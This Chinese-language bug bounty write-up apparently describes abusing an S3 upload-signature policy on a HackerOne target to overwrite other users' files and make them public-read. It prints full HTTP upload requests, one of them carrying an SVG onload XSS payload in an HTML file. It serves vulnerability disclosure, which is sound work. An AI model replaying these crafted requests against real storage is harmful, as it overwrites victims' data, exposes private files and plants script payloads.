滥用ACL权限覆盖S3存储桶中其他用户上传的文件/视频
大家好,今天我要写一篇关于在HackerOne某个项目中最新发现的博客。我在应用程序中寻找IDOR漏洞,于是开始对应用程序的每个请求进行模糊测试,我发现了以下请求:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
POST /api-2.0/s3-upload-signatures HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/home/xxx/test/upload
X-Requested-With: XMLHttpRequest, XMLHttpRequest
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Authorization: Bearer :X-Example-Authorization: Bearer
Content-Length: 311
Connection: close
Cookie: {}
{"expiration":"2018-12-18T11:58:24.376Z","conditions":[{"acl":"private"},{"bucket":"example-web-upload-bucket"},{"Content-Type":""},{"success_action_status":"200"},{"key":"a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg"},{"x-amz-meta-qqfilename":"1.jpg"},["content-length-range","1","9007199254740992"]]}
|
基本上,这个请求用于设置策略以上传文件到S3存储桶,在这个请求之后,我得到了下面提到的照片/视频上传请求。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
|
POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"
text/html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"
200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"
public-read
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy}
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:
-----------------------------1268156844136880633597812894--
|
这个请求使用了第一个请求中生成的文件上传策略。我尝试找出应用程序当前使用的S3存储桶上存在的其他文件,一旦我知道了同一存储桶上的一些照片/视频名称,我尝试创建一个自定义策略来上传无限制的文件到存储桶,这将覆盖现有文件,并且ACL权限是私有的,所以我想要用public-read替换它,这样应用程序中的每个用户都会受到这种攻击的影响。
我尝试通过更改请求中的以下值来创建自定义策略:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"
200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"
private
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy}
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type:
-----------------------------1268156844136880633597812894--
|
如截图所示,它创建了自定义策略来上传HTML文件,这将覆盖服务器上的现有文件。
我将策略用于文件上传请求,请求如下所示:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
POST / HTTP/1.1
Host: example-web-upload-bucket.s3.amazonaws.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: multipart/form-data; boundary=---------------------------1268156844136880633597812894
Content-Length: 1716
Origin: https://www.example.com
Connection: close
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="key"
a4fe6f57-a208-43a8-8aab-be2ac6ad06f9.jpg
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="AWSAccessKeyId"
AKIAIOTLFW3HMG563JEA
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="Content-Type"
text/html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="success_action_status"
200
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="acl"
public-read
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="x-amz-meta-qqfilename"
1.html
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="policy"
xxxxxxxxxxxxx{this is policy}
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="signature"
n7QQDjsmZUL5fQMOXO0vvAF98kg=
-----------------------------1268156844136880633597812894
Content-Disposition: form-data; name="file"; filename="1.html"
Content-Type: text/html
<svg/onload=prompt`1`;>
-----------------------------1268156844136880633597812894--
|
现在,这个请求通过覆盖现有文件在存储桶上上传了无限制的文件,并且通过给文件public-read权限滥用了ACL权限。
就这样:D 感谢大家阅读。祝大家有美好的一天。